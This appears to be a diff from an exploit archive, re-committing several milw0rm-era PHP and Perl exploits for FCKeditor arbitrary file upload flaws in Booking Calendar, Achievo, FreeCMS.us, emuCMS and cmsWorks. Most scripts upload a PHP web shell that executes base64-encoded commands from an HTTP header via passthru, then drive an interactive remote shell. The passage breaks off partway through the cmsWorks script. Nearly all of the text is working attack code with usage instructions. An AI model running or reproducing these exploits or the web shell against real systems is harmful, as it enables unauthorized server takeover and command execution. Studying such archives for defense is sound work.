-$packet .= $data;
-preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
-if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
-else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
-define(STDIN, fopen("php://stdin", "r"));
-while(1)
-{
- print "\nstack-shell# ";
- $cmd = trim(fgets(STDIN));
- if ($cmd != "exit")
- {
-  $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
-  $packet.= "Host: {$host}\r\n";
-  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-  $packet.= "Connection: close\r\n\r\n";
-  $output = http_send($host, $packet);
-  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
-  $shell = explode("_code_", $output);
-  print "\n{$shell[1]}";
- }
- else break;
-}
-?>
-
-# milw0rm.com [2008-05-29]
+<?php
+/*
+ --------------------------------------------------------------
+ PHP Booking Calendar 10 d (fckeditor) Arbitrary File Upload Exploit
+ --------------------------------------------------------------
+ 
+  Special thnx for : Egix
+ [-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php
+ 
+ 41. // Get the posted file.
+ 42. $oFile = $_FILES['NewFile'] ;
+ 43.
+ 44. // Get the uploaded file name and extension.
+ 45. $sFileName = $oFile['name'] ;
+ 46. $sOriginalFileName = $sFileName ;
+ 47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
+ 48. $sExtension = strtolower( $sExtension ) ;
+ 49.
+ 50. // The the file type (from the QueryString, by default 'File').
+ 51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
+ 52.
+ 53. // Check if it is an allowed type.
+ 54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
+ 55.     SendResults( 1, '', '', 'Invalid type specified' ) ;
+ 56.
+ 57. // Get the allowed and denied extensions arrays.
+ 58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
+ 59. $arDenied = $Config['DeniedExtensions'][$sType] ;
+ 60.
+ 61. // Check if it is an allowed extension.
+ 62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
+ 63.  SendResults( '202' ) ;
+ 64.
+ 65. $sErrorNumber = '0' ;
+ 66. $sFileUrl  = '' ;
+ 67.
+ 68. // Initializes the counter used to rename the file, if another one with the same name already exists.
+ 69. $iCounter = 0 ;
+ 70.
+ 71. // The the target directory.
+ 72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
+ 73.  $sServerDir = $Config['UserFilesAbsolutePath'] ;
+ 74. else
+ 75.  //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
+ 76.  $sServerDir = $Config["UserFilesPath"] ;
+ 77.
+ 78. while ( true )
+ 79. {
+ 80.  // Compose the file path.
+ 81.  $sFilePath = $sServerDir . $sFileName ;
+ 82.
+ 83.  // If a file with that name already exists.
+ 84.  if ( is_file( $sFilePath ) )
+ 85.  {
+ 86.   $iCounter++ ;
+ 87.   $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
+ 88.   $sErrorNumber = '201' ;
+ 89.  }
+ 90.  else
+ 91.  {
+ 92.   move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
+ 93.
+ 94.   if ( is_file( $sFilePath ) )
+ 95.   {
+ 96.    $oldumask = umask(0) ;
+ 97.    chmod( $sFilePath, 0777 ) ;
+ 98.    umask( $oldumask ) ;
+ 99.   }
+ 100.  
+ 101.   $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
+ 102.
+ 103.   break ;
+ 
+ with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
+*/
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+function http_send($host, $packet)
+{
+ $sock = fsockopen($host, 80);
+ while (!$sock)
+ {
+  print "\n[-] No response from {$host}:80 Trying again...";
+  $sock = fsockopen($host, 80);
+ }
+ fputs($sock, $packet);
+ while (!feof($sock)) $resp .= fread($sock, 1024);
+ fclose($sock);
+ return $resp;
+}
+print "\n+------------------------------------------------------------+";
+print "\n|PHP Booking Calendar 10d Arbitrary File Upload Exploit by Stack |";
+print "\n+------------------------------------------------------------+\n";
+if ($argc < 2)
+{
+ print "\nUsage......: php $argv[0] host path";
+ print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
+ die();
+}
+$host = $argv[1];
+$path = $argv[2];
+$data  = "--12345\r\n";
+$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
+$data .= "Content-Type: application/octet-stream\r\n\r\n";
+$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
+$data .= "--12345--\r\n";
+$packet  = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Content-Length: ".strlen($data)."\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
+$packet .= "Connection: close\r\n\r\n";
+$packet .= $data;
+preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
+if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
+else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
+define(STDIN, fopen("php://stdin", "r"));
+while(1)
+{
+ print "\nstack-shell# ";
+ $cmd = trim(fgets(STDIN));
+ if ($cmd != "exit")
+ {
+  $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
+  $packet.= "Host: {$host}\r\n";
+  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+  $packet.= "Connection: close\r\n\r\n";
+  $output = http_send($host, $packet);
+  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
+  $shell = explode("_code_", $output);
+  print "\n{$shell[1]}";
+ }
+ else break;
+}
+?>
+
+# milw0rm.com [2008-05-29]
diff --git a/platforms/php/webapps/5770.php b/platforms/php/webapps/5770.php
index cb6521f4f..8af7f549d 100755
--- a/platforms/php/webapps/5770.php
+++ b/platforms/php/webapps/5770.php
@@ -1,125 +1,125 @@
-<?php
-
-/*
-	-----------------------------------------------------------------
-	Achievo <= 1.3.2 (fckeditor) Remote Arbitrary File Upload Exploit
-	-----------------------------------------------------------------
-	
-	author...: EgiX
-	mail.....: n0b0d13s[at]gmail[dot]com
-	
-	link.....: http://www.achievo.org/
-	details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
-	
-	[-] vulnerable code in /atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php
-	
-	121.	//File Area
-	122.	$fckphp_config['ResourceAreas']['File'] =array(
-	123.		
-	124.		//Files(identified by extension) that may be uploaded to this area
-	125.		'AllowedExtensions'	=>	array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
-	
-	with a default configuration of this script, an attacker might be able to upload arbitrary
-	files containing malicious PHP code due to multiple file extensions isn't properly checked
-*/
-
-error_reporting(0);
-set_time_limit(0);
-ini_set("default_socket_timeout", 5);
-
-function http_send($host, $packet)
-{
-	$sock = fsockopen($host, 80);
-	while (!$sock)
-	{
-		print "\n[-] No response from {$host}:80 Trying again...";
-		$sock = fsockopen($host, 80);
-	}
-	fputs($sock, $packet);
-	while (!feof($sock)) $resp .= fread($sock, 1024);
-	fclose($sock);
-	return $resp;
-}
-
-function upload()
-{
-	global $host, $path;
-	
-	$connector = "atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php";
-	$file_ext  = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
-	
-	foreach ($file_ext as $ext)
-	{
-		print "\n[-] Trying to upload with .{$ext} extension...";
-		
-		$data  = "--12345\r\n";
-		$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
-		$data .= "Content-Type: application/octet-stream\r\n\r\n";
-		$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
-		$data .= "--12345--\r\n";
-		
-		$packet  = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
-		$packet .= "Host: {$host}\r\n";
-		$packet .= "Content-Length: ".strlen($data)."\r\n";
-		$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
-		$packet .= "Connection: close\r\n\r\n";
-		$packet .= $data;
-		
-		preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
-		
-		if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
-		
-		$packet  = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
-		$packet .= "Host: {$host}\r\n";
-		$packet .= "Connection: close\r\n\r\n";
-		$html    = http_send($host, $packet);
-		
-		if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
-		
-		sleep(1);
-	}
-	
-	return false;
-}
-
-print "\n+--------------------------------------------------------------------+";
-print "\n| Achievo <= 1.3.2 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
-print "\n+--------------------------------------------------------------------+\n";
-
-if ($argc < 3)
-{
-	print "\nUsage......: php $argv[0] host path\n";
-	print "\nExample....: php $argv[0] localhost /";
-	print "\nExample....: php $argv[0] localhost /achievo/\n";
-	die();
-}
-
-$host = $argv[1];
-$path = $argv[2];
-
-if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
-else print "\n[-] Shell uploaded...starting it!\n";
-
-define(STDIN, fopen("php://stdin", "r"));
-
-while(1)
-{
-	print "\nachievo-shell# ";
-	$cmd = trim(fgets(STDIN));
-	if ($cmd != "exit")
-	{
-		$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
-		$packet.= "Host: {$host}\r\n";
-		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-		$packet.= "Connection: close\r\n\r\n";
-		$html   = http_send($host, $packet);
-		if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
-		$shell = explode("_code_", $html);
-		print "\n{$shell[1]}";
-	}
-	else break;
-}
-
-?>
-
-# milw0rm.com [2008-06-09]
+<?php
+
+/*
+	-----------------------------------------------------------------
+	Achievo <= 1.3.2 (fckeditor) Remote Arbitrary File Upload Exploit
+	-----------------------------------------------------------------
+	
+	author...: EgiX
+	mail.....: n0b0d13s[at]gmail[dot]com
+	
+	link.....: http://www.achievo.org/
+	details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
+	
+	[-] vulnerable code in /atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php
+	
+	121.	//File Area
+	122.	$fckphp_config['ResourceAreas']['File'] =array(
+	123.		
+	124.		//Files(identified by extension) that may be uploaded to this area
+	125.		'AllowedExtensions'	=>	array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
+	
+	with a default configuration of this script, an attacker might be able to upload arbitrary
+	files containing malicious PHP code due to multiple file extensions isn't properly checked
+*/
+
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+
+function http_send($host, $packet)
+{
+	$sock = fsockopen($host, 80);
+	while (!$sock)
+	{
+		print "\n[-] No response from {$host}:80 Trying again...";
+		$sock = fsockopen($host, 80);
+	}
+	fputs($sock, $packet);
+	while (!feof($sock)) $resp .= fread($sock, 1024);
+	fclose($sock);
+	return $resp;
+}
+
+function upload()
+{
+	global $host, $path;
+	
+	$connector = "atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php";
+	$file_ext  = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
+	
+	foreach ($file_ext as $ext)
+	{
+		print "\n[-] Trying to upload with .{$ext} extension...";
+		
+		$data  = "--12345\r\n";
+		$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
+		$data .= "Content-Type: application/octet-stream\r\n\r\n";
+		$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
+		$data .= "--12345--\r\n";
+		
+		$packet  = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
+		$packet .= "Host: {$host}\r\n";
+		$packet .= "Content-Length: ".strlen($data)."\r\n";
+		$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
+		$packet .= "Connection: close\r\n\r\n";
+		$packet .= $data;
+		
+		preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
+		
+		if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
+		
+		$packet  = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
+		$packet .= "Host: {$host}\r\n";
+		$packet .= "Connection: close\r\n\r\n";
+		$html    = http_send($host, $packet);
+		
+		if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
+		
+		sleep(1);
+	}
+	
+	return false;
+}
+
+print "\n+--------------------------------------------------------------------+";
+print "\n| Achievo <= 1.3.2 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
+print "\n+--------------------------------------------------------------------+\n";
+
+if ($argc < 3)
+{
+	print "\nUsage......: php $argv[0] host path\n";
+	print "\nExample....: php $argv[0] localhost /";
+	print "\nExample....: php $argv[0] localhost /achievo/\n";
+	die();
+}
+
+$host = $argv[1];
+$path = $argv[2];
+
+if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
+else print "\n[-] Shell uploaded...starting it!\n";
+
+define(STDIN, fopen("php://stdin", "r"));
+
+while(1)
+{
+	print "\nachievo-shell# ";
+	$cmd = trim(fgets(STDIN));
+	if ($cmd != "exit")
+	{
+		$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
+		$packet.= "Host: {$host}\r\n";
+		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+		$packet.= "Connection: close\r\n\r\n";
+		$html   = http_send($host, $packet);
+		if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
+		$shell = explode("_code_", $html);
+		print "\n{$shell[1]}";
+	}
+	else break;
+}
+
+?>
+
+# milw0rm.com [2008-06-09]
diff --git a/platforms/php/webapps/5844.php b/platforms/php/webapps/5844.php
index 3218f8900..596005ba0 100755
--- a/platforms/php/webapps/5844.php
+++ b/platforms/php/webapps/5844.php
@@ -1,73 +1,73 @@
-<?php
-/*
- --------------------------------------------------------------
- FreeCMS.us 0.2 (fckeditor) Arbitrary File Upload Exploit
- --------------------------------------------------------------
- By : Stack
-  Special thnx for : Egix
- [-] vulnerable code in /[path]/admin/fckeditor/editor/filemanager/upload/php/upload.php
- 
- with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
-*/
-error_reporting(0);
-set_time_limit(0);
-ini_set("default_socket_timeout", 5);
-function http_send($host, $packet)
-{
- $sock = fsockopen($host, 80);
- while (!$sock)
- {
-  print "\n[-] No response from {$host}:80 Trying again...";
-  $sock = fsockopen($host, 80);
- }
- fputs($sock, $packet);
- while (!feof($sock)) $resp .= fread($sock, 1024);
- fclose($sock);
- return $resp;
-}
-print "\n+------------------------------------------------------------+";
-print "\n|File Upload Exploit by Stack |";
-print "\n+------------------------------------------------------------+\n";
-if ($argc < 2)
-{
- print "\nUsage......: php $argv[0] host path";
- print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
- die();
-}
-$host = $argv[1];
-$path = $argv[2];
-$data  = "--12345\r\n";
-$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
-$data .= "Content-Type: application/octet-stream\r\n\r\n";
-$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
-$data .= "--12345--\r\n";
-$packet  = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
-$packet .= "Content-Length: ".strlen($data)."\r\n";
-$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
-$packet .= "Connection: close\r\n\r\n";
-$packet .= $data;
-preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
-if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
-else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
-define(STDIN, fopen("php://stdin", "r"));
-while(1)
-{
- print "\nstack-shell# ";
- $cmd = trim(fgets(STDIN));
- if ($cmd != "exit")
- {
-  $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
-  $packet.= "Host: {$host}\r\n";
-  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-  $packet.= "Connection: close\r\n\r\n";
-  $output = http_send($host, $packet);
-  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
-  $shell = explode("_code_", $output);
-  print "\n{$shell[1]}";
- }
- else break;
-}
-?>
-
-# milw0rm.com [2008-06-17]
+<?php
+/*
+ --------------------------------------------------------------
+ FreeCMS.us 0.2 (fckeditor) Arbitrary File Upload Exploit
+ --------------------------------------------------------------
+ By : Stack
+  Special thnx for : Egix
+ [-] vulnerable code in /[path]/admin/fckeditor/editor/filemanager/upload/php/upload.php
+ 
+ with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
+*/
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+function http_send($host, $packet)
+{
+ $sock = fsockopen($host, 80);
+ while (!$sock)
+ {
+  print "\n[-] No response from {$host}:80 Trying again...";
+  $sock = fsockopen($host, 80);
+ }
+ fputs($sock, $packet);
+ while (!feof($sock)) $resp .= fread($sock, 1024);
+ fclose($sock);
+ return $resp;
+}
+print "\n+------------------------------------------------------------+";
+print "\n|File Upload Exploit by Stack |";
+print "\n+------------------------------------------------------------+\n";
+if ($argc < 2)
+{
+ print "\nUsage......: php $argv[0] host path";
+ print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
+ die();
+}
+$host = $argv[1];
+$path = $argv[2];
+$data  = "--12345\r\n";
+$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
+$data .= "Content-Type: application/octet-stream\r\n\r\n";
+$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
+$data .= "--12345--\r\n";
+$packet  = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Content-Length: ".strlen($data)."\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
+$packet .= "Connection: close\r\n\r\n";
+$packet .= $data;
+preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
+if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
+else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
+define(STDIN, fopen("php://stdin", "r"));
+while(1)
+{
+ print "\nstack-shell# ";
+ $cmd = trim(fgets(STDIN));
+ if ($cmd != "exit")
+ {
+  $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
+  $packet.= "Host: {$host}\r\n";
+  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+  $packet.= "Connection: close\r\n\r\n";
+  $output = http_send($host, $packet);
+  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
+  $shell = explode("_code_", $output);
+  print "\n{$shell[1]}";
+ }
+ else break;
+}
+?>
+
+# milw0rm.com [2008-06-17]
diff --git a/platforms/php/webapps/5907.pl b/platforms/php/webapps/5907.pl
index 59c2bc74a..435229b1e 100755
--- a/platforms/php/webapps/5907.pl
+++ b/platforms/php/webapps/5907.pl
@@ -1,29 +1,29 @@
-#!/usr/bin/perl
-use strict;
-use warnings;
-use LWP::UserAgent;
-use HTTP::Request::Common;
-print <<INTRO;
-+++++++++++++++++++++++++++++++++++++++++++++++++++++
-+emuCMS 0.3 (fckeditor) Arbitrary File Upload  xpl  +
-+                                                   +
-+                   By: Stack                       +
-+++++++++++++++++++++++++++++++++++++++++++++++++++++
-# t0pP8uZz  
-INTRO
-print "Enter URL(ie: http://site.com): ";
-    chomp(my $url=<STDIN>);
-   
-print "Enter File Path(path to local file to upload): ";
-    chomp(my $file=<STDIN>);
-my $ua = LWP::UserAgent->new;
-my $re = $ua->request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php',
-                      Content_Type => 'form-data',
-                      Content      => [ NewFile => $file ] );
-if($re->is_success) {
-    if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
-    else { print "File Upload Is Disabled! Failed!\n"; }
-} else { print "HTTP Request Failed!\n"; }
-exit;
-
-# milw0rm.com [2008-06-23]
+#!/usr/bin/perl
+use strict;
+use warnings;
+use LWP::UserAgent;
+use HTTP::Request::Common;
+print <<INTRO;
++++++++++++++++++++++++++++++++++++++++++++++++++++++
++emuCMS 0.3 (fckeditor) Arbitrary File Upload  xpl  +
++                                                   +
++                   By: Stack                       +
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+# t0pP8uZz  
+INTRO
+print "Enter URL(ie: http://site.com): ";
+    chomp(my $url=<STDIN>);
+   
+print "Enter File Path(path to local file to upload): ";
+    chomp(my $file=<STDIN>);
+my $ua = LWP::UserAgent->new;
+my $re = $ua->request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php',
+                      Content_Type => 'form-data',
+                      Content      => [ NewFile => $file ] );
+if($re->is_success) {
+    if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
+    else { print "File Upload Is Disabled! Failed!\n"; }
+} else { print "HTTP Request Failed!\n"; }
+exit;
+
+# milw0rm.com [2008-06-23]
diff --git a/platforms/php/webapps/5922.php b/platforms/php/webapps/5922.php
index 4d0ff283d..2687d9c06 100755
--- a/platforms/php/webapps/5922.php
+++ b/platforms/php/webapps/5922.php
@@ -1,112 +1,112 @@
-<?php
-/*
- -----------------------------------------------------------------
- cmsWorks 2.2 RC4   (fckeditor) Remote Arbitrary File Upload Exploit
- -----------------------------------------------------------------
- discovered by Stack
- exploited by ..: EgiX
- special thnx to EgiX
- details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
- 
- [-] vulnerable code in path/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php
- 
- 121. //File Area
- 122. $fckphp_config['ResourceAreas']['File'] =array(
- 123.  
- 124.  //Files(identified by extension) that may be uploaded to this area
- 125.  'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
- 
- with a default configuration of this script, an attacker might be able to upload arbitrary
- files containing malicious PHP code due to multiple file extensions isn't properly checked
-*/
-error_reporting(0);
-set_time_limit(0);
-ini_set("default_socket_timeout", 5);
-function http_send($host, $packet)
-{
- $sock = fsockopen($host, 80);
- while (!$sock)
- {
-  print "\n[-] No response from {$host}:80 Trying again...";
-  $sock = fsockopen($host, 80);
- }
- fputs($sock, $packet);
- while (!feof($sock)) $resp .= fread($sock, 1024);
- fclose($sock);
- return $resp;
-}
-function upload()
-{
- global $host, $path;
- 
- $connector = "/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php";
- $file_ext  = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
- 
- foreach ($file_ext as $ext)
- {
-  print "\n[-] Trying to upload with .{$ext} extension...";
-  
-  $data  = "--12345\r\n";
-  $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
-  $data .= "Content-Type: application/octet-stream\r\n\r\n";
-  $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
-  $data .= "--12345--\r\n";
-  
-  $packet  = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
-  $packet .= "Host: {$host}\r\n";
-  $packet .= "Content-Length: ".strlen($data)."\r\n";
-  $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
-  $packet .= "Connection: close\r\n\r\n";
-  $packet .= $data;
-  
-  preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
-  
-  if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
-  
-  $packet  = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
-  $packet .= "Host: {$host}\r\n";
-  $packet .= "Connection: close\r\n\r\n";
-  $html    = http_send($host, $packet);
-  
-  if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
-  
-  sleep(1);
- }
- 
- return false;
-}
-print "\n+--------------------------------------------------------------------+";
-print "\n| cmsWorks 2.2 RC4   (fckeditor) Remote Arbitrary File Upload Exploit |";
-print "\n+--------------------------------------------------------------------+\n";
-if ($argc < 3)
-{
- print "\nUsage......: php $argv[0] host path\n";
- print "\nExample....: php $argv[0] localhost /";
- print "\nExample....: php $argv[0] localhost /achievo/\n";
- die();
-}
-$host = $argv[1];
-$path = $argv[2];
-if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
-else print "\n[-] Shell uploaded...starting it!\n";
-define(STDIN, fopen("php://stdin", "r"));
-while(1)
-{
- print "\nStack-shell# ";
- $cmd = trim(fgets(STDIN));
- if ($cmd != "exit")
- {
-  $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
-  $packet.= "Host: {$host}\r\n";
-  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-  $packet.= "Connection: close\r\n\r\n";
-  $html   = http_send($host, $packet);
-  if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
-  $shell = explode("_code_", $html);
-  print "\n{$shell[1]}";
- }
- else break;
-}
-?>
-
-# milw0rm.com [2008-06-23]
+<?php
+/*
+ -----------------------------------------------------------------
+ cmsWorks 2.2 RC4   (fckeditor) Remote Arbitrary File Upload Exploit
+ -----------------------------------------------------------------
+ discovered by Stack
+ exploited by ..: EgiX
+ special thnx to EgiX
+ details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
+ 
+ [-] vulnerable code in path/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php
+ 
+ 121. //File Area
+ 122. $fckphp_config['ResourceAreas']['File'] =array(
+ 123.  
+ 124.  //Files(identified by extension) that may be uploaded to this area
+ 125.  'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
+ 
+ with a default configuration of this script, an attacker might be able to upload arbitrary
+ files containing malicious PHP code due to multiple file extensions isn't properly checked
+*/
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+function http_send($host, $packet)
+{
+ $sock = fsockopen($host, 80);
+ while (!$sock)
+ {
+  print "\n[-] No response from {$host}:80 Trying again...";
+  $sock = fsockopen($host, 80);
+ }
+ fputs($sock, $packet);
+ while (!feof($sock)) $resp .= fread($sock, 1024);
+ fclose($sock);
+ return $resp;
+}
+function upload()
+{
+ global $host, $path;
+ 
+ $connector = "/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php";
+ $file_ext  = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
+ 
+ foreach ($file_ext as $ext)
+ {
+  print "\n[-] Trying to upload with .{$ext} extension...";
+  
+  $data  = "--12345\r\n";
+  $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
+  $data .= "Content-Type: application/octet-stream\r\n\r\n";
+  $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
+  $data .= "--12345--\r\n";
+  
+  $packet  = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
+  $packet .= "Host: {$host}\r\n";
+  $packet .= "Content-Length: ".strlen($data)."\r\n";
+  $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
+  $packet .= "Connection: close\r\n\r\n";
+  $packet .= $data;
+  
+  preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
+  
+  if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
+  
+  $packet  = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
+  $packet .= "Host: {$host}\r\n";
+  $packet .= "Connection: close\r\n\r\n";
+  $html    = http_send($host, $packet);
+  
+  if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
+  
+  sleep(1);
+ }
+ 
+ return false;
+}
+print "\n+--------------------------------------------------------------------+";
+print "\n| cmsWorks 2.2 RC4   (fckeditor) Remote Arbitrary File Upload Exploit |";
+print "\n+--------------------------------------------------------------------+\n";
+if ($argc < 3)
+{
+ print "\nUsage......: php $argv[0] host path\n";
+ print "\nExample....: php $argv[0] localhost /";
+ print "\nExample....: php $argv[0] localhost /achievo/\n";
+ die();
+}
+$host = $argv[1];
+$path = $argv[2];
